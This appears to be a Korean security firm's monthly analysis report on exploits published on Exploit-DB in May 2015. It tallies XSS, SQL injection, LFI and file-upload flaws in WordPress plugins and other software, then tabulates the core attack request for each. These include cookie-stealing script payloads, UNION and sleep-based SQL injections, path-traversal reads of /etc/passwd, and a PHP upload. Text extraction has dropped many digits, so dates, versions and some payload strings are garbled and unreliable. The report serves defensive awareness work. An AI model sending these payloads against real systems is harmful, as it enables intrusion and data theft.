3708 하 중 Landing Pages Plugin post.php 3708 XSS 하 중 Landing Pages Plugin post-new.php 3707 하 중 NewStatPress Plugin admin.php 3707

분석내용정리 ( 작성 : 펜타시큐리티시스템보안성평가팀 ) EDB 분석보고서 (205.05) 205.05.0~205.05.3 Exploit-DB(http://exploit-db.com) 에공개된별로분류한정보입니다. 205 년 5 월에공개된 Exploit-DB 의분석결과, XSS (Cross Site Scripting) 공격에대한보고개수가가장많았습니다. 분석된 XSS 공격들은모두스크립트를파라미터에삽입하는단순한공격으로써, 기본적인입력값및특수문자를체크하였다면충분히막을수있는공격들이었습니다. 주요소프트웨어별발생현황을보면, 4 월과마찬가지로대표적인 CMS 인 에서가장많은이보고되었습니다. 사용자수가많고 Plugin 도다양하게제공되는 는그만큼해커들의주요공격대상이되므로 를사용하는관리자는항상최신의보안업데이트상태를유지하는것이필요합니다. 다음으로는 소프트웨어에서많은이보고되었습니다. 위험도가낮은들이발견되었지만 PHPMyAdmin 의 JSP 버전인 JSPMyadmin 역시사용자가많은소프트웨어이기때문에, 주기적인보안패치를실시하여공격위험을최소화할수있도록노력하여야하겠습니다.. 별보고개수 보고개수 XSS 7 5 LFI 3 File Upload 총합계 36 40 35 30 25 20 5 0 5 0 별보고개수 36 7 5 3 XSS LFI File Upload 총합계 2. 위험도별분류위험도 보고개수 백분율 상 4.% 중 32 88.89% 하 0 0.00% 합계 36 00.00% 위험도별분류 4 상 중 32 3. 공격난이도별현황공격난이도 보고개수 백분율 상 0 0.00% 중 3 8.33% 하 33 9.67% 총합계 36 00.00% 공격난이도별현황 3 중 하 33 4. 주요소프트웨어별발생현황소프트웨어이름 SynTail Xeams Buddy Wing FTP Server Admin Pluck PHPCollab Chronosite 총합계 보고개수 20 5 2 36 2 주요소프트웨어별발생현황 5 20 SynTail Xeams Buddy Wing FTP Server Admin Pluck ** 5개이상발생한주요소프트웨어별상세 EDB 번호 종류 공격난이도 공격위험도 이름 소프트웨어이름 36907 XSS 하 중 Ultimate Product Catalogue 3..2 - admin.php XSS 36907 File Upload 하 상 Ultimate Product Catalogue 3..2 - admin.php File Upload 36942 하 중 Freshmail Plugin <=.5.8 - post.php 36930 하 중 Freshmail Unauthenticated - admin-ajax.php 36959 XSS 하 중 ClickBank Ads Plugin.7 - clickbank-ads.php XSS 36958 XSS 하 중 Ultimate Profile Builder Plugin 2.3.3 - admin.php XSS 36954 XSS 하 중 Yet Another Related Posts Plugin <= 4.2.4 - options-general.php XSS 37003 Booking Calendar Contact Form.0.2 - /wp-path/wp-admin/ 하중 37003 Booking Calendar Contact Form.0.2 - admin-ajax.php 취약하중 점 37003 하 중 Booking Calendar Contact Form.0.2 - /wp-path/ 37067 중 상 Feed Plugin 205.0426 - admin.php 37080 하 중 WP Symposium Plugin 5. - / 373 Wordpess Simple Photo Gallery.7.8 - 중상 /index.php/wppg_photogallery/wppg_photo_details/ 372 XSS 하 중 church_admin Plugin 0.800 - /wordpress/index.php/205/05/2/church_admin-registration-form/ XSS 3709 하 중 GigPress Plugin 2.3.8 - gigpress.php

3708 하 중 Landing Pages Plugin.8.4 - post.php 3708 XSS 하 중 Landing Pages Plugin.8.4 - post-new.php 3707 하 중 NewStatPress Plugin 0.9.8 - admin.php 3707 XSS 하 중 NewStatPress Plugin 0.9.8 - admin.php XSS 3732 XSS 하 중 Plugin Free Counter. - admin-ajax.php XSS

EDB 분석보고서 (205.05) 205.05.0~205.05.3 Exploit-DB(http://exploit-db.com) 에공개된별로분류한정보입니다. 날짜 EDB 번호분류공격난이도공격위험도이름핵심공격코드대상프로그램대상환경 205-05-04 36907 XSS 하중 Ultimate Product Catalogue 3..2 - admin.php XSS POST /wp-admin/admin.php?page=upcpoptions&action=upcp_editproduct&update_item=produc t&item_id=6 HTTP/. Chrome/6.0.92.75 Safari/535.7 action=edit_product&_wp_http_referer=/wpadmin/admin.php?page=upcpoptions&action=upcp_editproduct&update_item=produc t&item_id=6&item_name=product name</a><script>alert('product Name says: '+document.cookie)</script><a>&item_slug=asdf&item_id =6&Item_Image=http://i.imgur.com/6cWKujq.gif&Item_P rice=666&item_description=product description says<script>alert('product description says: '+document.cookie)</script>&item_seo_description=seo desc&item_link=&item_display_status=show&category_i D=&SubCategory_ID= Ultimate Product Catalogue 3..2 205-05-04 36907 File Upload 하상 Ultimate Product Catalogue 3..2 - admin.php File Upload POST /wp-admin/admin.php?page=upcpoptions&action=upcp_addproductspreadsheet&displaypa ge=product HTTP/. Connection: Close Accept: text/html, application/xhtml+xml, */* Accept-Language: ko-kr User-Agent: Mozilla/5.0 (compatible; MSIE 0.0; Windows NT 6.2; WOW64; Trident/6.0) Content-Type: multipart/form-data; boundary=--------------- ------------7dd0029908f2 Ultimate Product Catalogue 3..2 -----------------------------7dd0029908f2 Content-Disposition: form-data; name="uploadfile"; filename="cooldog.php" Content-Type: application/octet-stream <? phpinfo();?> -----------------------------7dd0029908f2-- POST /wp-admin/post.php HTTP/. 205-05-07 36942 하중 Freshmail Plugin <=.5.8 - post.php Chrome/6.0.92.75 Safari/535.7 Freshmail Plugin <=.5.8 content=[fm_form id='" and substr(user(),,)="b] POST wp-admin/admin-ajax.php HTTP/. 205-05-07 36930 하중 Freshmail Unauthenticated - adminajax.php Chrome/6.0.92.75 Safari/535.7 Freshmail <=3D.5.8 form%5bemail%5d=3dfake@fake.com&form%5bimie%5d =3Dasdf&fm_form_id=3D" and "a"=3d"a&action=3dfm_form&fm_form_referer=3d%2f 205-05-08 36959 XSS 하중 POST /wp/wp-admin/optionsgeneral.php?page=clickbank-ads-clickbankwidget/clickbank-ads.php HTTP/. ClickBank Ads Plugin.7 - clickbank-ads.php XSS 취약 Chrome/6.0.92.75 Safari/535.7 점 ClickBank Ads Plugin.7 cbwec[title]=">>><script>+-+--+- +alert(document.cookie)</script>

EDB 분석보고서 (205.05) 205.05.0~205.05.3 Exploit-DB(http://exploit-db.com) 에공개된별로분류한정보입니다. 날짜 EDB 번호분류공격난이도공격위험도이름핵심공격코드대상프로그램대상환경 205-05-08 36958 XSS 하중 POST /wp/wp-admin/admin.php?page=ultimatepb_field HTTP/. Ultimate Profile Builder Plugin 2.3.3 - admin.php Chrome/6.0.92.75 Safari/535.7 XSS field_name=<script>alert("")</script> Ultimate Profile Builder Plugin 2.3.3 205-05-08 36954 XSS 하중 Yet Another Related Posts Plugin <= 4.2.4 - optionsgeneral.php XSS POST /wp/wp-admin/admin.php?page=ultimatepb_field HTTP/. Chrome/6.0.92.75 Safari/535.7 Yet Another Related Posts Plugin <= 4.2.4 no_results=<script>alert();</script> 205-05-08 36953 XSS 하중 SynTail <=.5 Build 566 - /app XSS POST /app HTTP/. Chrome/6.0.92.75 Safari/535.7 SynTail SynTail <=.5 Build 566 friendlyname=<script>alert("marlow")</script> 205-05-08 3695 XSS 하중 SynaMan <= 3.4 Build 436 - /app XSS /app?sharedname=%3cscript%3ealert%28%22xss%22 %29%3C%2Fscript%3E&selectedPath=C%3A\&publicR ead=&publicwrite=&operation=mngfolders&st=addfol der SynaMan SynaMan <= 3.4 Build 436 205-05-08 36950 XSS 하중 Syncrify Server <= 3.6 Build 833 - /app XSS /app?adminemail=%3cscript%3ealert%28victim%29% 3C%2Fscript%3E&smtpServer=27.0.0.&smtpPort=25&s mtpuser=%3cscript%3ealert%284%29%3c%2fscript% 3E&smtpPassword=admin&smtpSecurity=None&proceedB utton=save&operation=config&st=savesmtp Syncrify Syncrify Server <= 3.6 Build 833 205-05-08 36949 XSS 하중 Xeams <= 4.5 Build 5755 - / XSS /FrontController?domainname=%3Cscript%3Ealert%28 %22XSS%22%29%3C%2Fscript%3E&operation=60 Xeams Xeams <= 4.5 Build 5755 205-05- 36993 LFI 하중 Buddy.3.3 - /sqlbuddy/ LFI /sqlbuddy/#page=../../../restricted/user_pwd.sql# Buddy Buddy.3.3 205-05- 36992 XSS 하중 Wing FTP Server Admin <= 4.4.5 - /admin_loglist.html XSS /admin_loglist.html?domain=<script>alert();</script> Wing FTP Server Admin Wing FTP Server Admin <= 4.4.5 205-05- 36990 LFI 하중 205-05- 36989 중상 205-05- 36986 LFI 하중 3.6.5 - view_file.php LFI 3.6.5 - new_sidebar.php /www/view_file.php?action=download&file=../../../../../../ etc/passwd/ /www/new_sidebar.php?sbctg=lessons&new_lesson_id=n ull+union+select+password+from+users+where+id= /pluck- Pluck 4.7-4_7/data/modules/albums/albums_getimage.php?image= albums_getimage.php LFI \..\..\..\..\..\..\..\Windows\system.ini 3.6.5 3.6.5 Pluck Pluck 4.7 205-05-3 37004 하중 205-05-3 37003 하중 PHPCollab 2.5 - deletetopics.php Booking Calendar Contact Form.0.2 - /wppath/wp-admin/ /phpcollab/topics/deletetopics.php?project=%27%20and %20%27a%27%3D%27a%27 /wp-path/wpadmin/?action=dex_bccf_check_posted_data&dex_bccf=l oadseasonprices&dex_item=%20union%20select%20nu ll,%20null PHPCollab PHPCollab 2.5 Booking Calendar Contact Form.0.2 205-05-3 37003 하중 Booking Calendar Contact Form.0.2 - adminajax.php POST /wp-path/wp-admin/adminajax.php?action=dex_bccf_calendar_ajaxevent&dex_bccf_ calendar_load2=delete HTTP/. Chrome/6.0.92.75 Safari/535.7 Booking Calendar Contact Form.0.2 id='%20or%20sleep(00)# 205-05-3 37003 하중 Booking Calendar Contact Form.0.2 - /wp-path/ POST /wppath/?action=dex_bccf_check_posted_data&dex_bccf=get cost HTTP/. Chrome/6.0.92.75 Safari/535.7 Booking Calendar Contact Form.0.2 dex_item=%20union%20select%20null,%20null

EDB 분석보고서 (205.05) 205.05.0~205.05.3 Exploit-DB(http://exploit-db.com) 에공개된별로분류한정보입니다. 날짜 EDB 번호분류공격난이도공격위험도이름핵심공격코드대상프로그램대상환경 205-05-8 37050 하중 Chronosite 5.2 - archives.php /cms/chronosite_52/archives.php?numero=%27%20and %20%27a%27%3D%27a%27 Chronosite Chronosite 5.2 205-05-20 37067 중상 Feed Plugin 205.0426 - admin.php /wpadmin/admin.php?page=feedwordpress/syndication.php& action=update Checked&link_ids[]=) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL, NULL,NULL,CONCAT(0x76a6b6a7,0x707653577975 544373,0x7787627)-- FeedWordPre ss Plugin 205.0426 205-05-2 37080 하중 205-05-26 373 중상 WP Symposium Plugin 5. - / Wordpess Simple Photo Gallery.7.8 - /index.php/wppg_photogallery/ wppg_photo_details/ /?page_id=4&cid=&show=%20and%20= /wordpress/index.php/wppg_photogallery/wppg_photo_d etails/?gallery_id= AND (SELECT * FROM (SELECT(SLEEP(5)))QBzh)&image_id=4 WP Symposium Plugin 5. Wordpess Simple Photo Gallery.7.8 POST /wordpress/index.php/205/05/2/church_adminregistration-form/ HTTP/. Chrome/6.0.92.75 Safari/535.7 205-05-26 372 XSS 하중 save=yes&church_admin_register=9d8cf0420&_wp_http _referer=%2fwordpress%2findex.php%2f205%2f05% church_admin Plugin 2F2%2Fchurch_admin-registrationform%2F&first_name%5B%5D=test&prefix%5B%5D=&l 0.800 - /wordpress/index.php/205/05/ ast_name%5b%5d=test&mobile%5b%5d=%2b3670&p 2/church_admin-registrationform/ XSS eople_type_id%5b%5d=&email%5b%5d=test%40test. test&sex=male&phone=%2b3670&address=%3cscript %3Econfirm%28%29%3C%2Fscript%3E&lat=5.5035 29583287&lng=- 0.4893359375&recaptcha_challenge_field=03AHJ_Vuv BRBOVts65lchUe_H_cAuISniJ4rFDcaPyecjg- HypsHSZSfTkCyZMUC6PjVQAkkuFDfpnsKn28LU8wIMxb9n F5g7XnIYLt0qGzhXcgX4LSX5ul7tPX3RSdussMajZ- _NYQnOMJZj8b5e5LJgK68Gjf8aaILIyxKud2OF2bmzoZKa 56gtjBbzXBEGASVMMFJ59uB9FsoJIzVRyMJmaXbbrgM0 jnsseegthefo83fuzs9uuqrbqgqazgymmtwdgz4xvrzxudv5zc76 ktq-lwkpa&recaptcha_response_field=34 church_admin Plugin 0.800 205-05-26 3709 하중 GigPress Plugin 2.3.8 - gigpress.php POST /wp-admin/admin.php?page=gigpress/gigpress.php HTTP/. Chrome/6.0.92.75 Safari/535.7 GigPress Plugin 2.3.8 _wpnonce=b3c92d92&_wp_http_referer=/wordpress/w p- admin/admin.php?page=gigpress/gigpress.php&gpaction =add&show_status=active&gp_mm=05&gp_dd=05&gp_y y=205&show_artist_id= and =&show_venue_id=&show_related=new 205-05-26 3708 하중 Landing Pages Plugin.8.4 - post.php /wpadmin/post.php?post=306%20and%20=&action=edit &lp-variation-id=&ab-action=delete-variation Landing Pages Plugin.8.4 205-05-26 3708 XSS 하중 Landing Pages Plugin.8.4 - post-new.php /wp-admin/post-new.php?post_type=inboundforms&post='></iframe><script>alert(string.fromcharcode (88, 83, 83))</script> Landing Pages Plugin.8.4 205-05-26 3707 하 중 205-05-26 3707 XSS 하 중 NewStatPress Plugin 0.9.8 - admin.php NewStatPress Plugin 0.9.8 - admin.php XSS /wpadmin/admin.php?where=agent%20and%20'a'='a'&lim itquery=&searchsubmit=buscar&page=nsp_search /wpadmin/admin.php?where=<script>alert(string.fromcharc ode(88,+83,+83))</script>&searchsubmit=buscar&page=n sp_search NewStatPress Plugin 0.9.8 NewStatPress Plugin 0.9.8 205-05-27 3732 XSS 하중 POST /wp-admin/admin-ajax.php HTTP/. Chrome/6.0.92.75 Safari/535.7 Plugin Free Counter. - admin-ajax.php XSS Plugin Free Counter. action=check_stat&id_counter=<counter_id from step 2>&value_=<script>alert()</script> 205-05-29 3752 하중 SPMyAdmin. - deletedata.jsp //deletedata.jsp?db=test&table=email&field= CATID or 'field'='name'.

EDB 분석보고서 (205.05) 205.05.0~205.05.3 Exploit-DB(http://exploit-db.com) 에공개된별로분류한정보입니다. 날짜 EDB 번호분류공격난이도공격위험도이름핵심공격코드대상프로그램대상환경 205-05-29 3752 XSS 하중 SPMyAdmin. - right.jsp XSS //right.jsp?server=localhost&db= "/><script>alert(666)</script>. 205-05-29 3752 XSS 하중 SPMyAdmin. - tabledata.jsp XSS //tabledata.jsp?db= "/><script>alert(666);</script>. 205-05-29 3752 XSS 하중 SPMyAdmin. - query.jsp XSS //query.jsp?server= "/><script>alert(666)</script>&db=. 205-05-29 3752 XSS 하중 SPMyAdmin. - export.jsp XSS //export.jsp?db=test&table= <script>alert(666)</script>.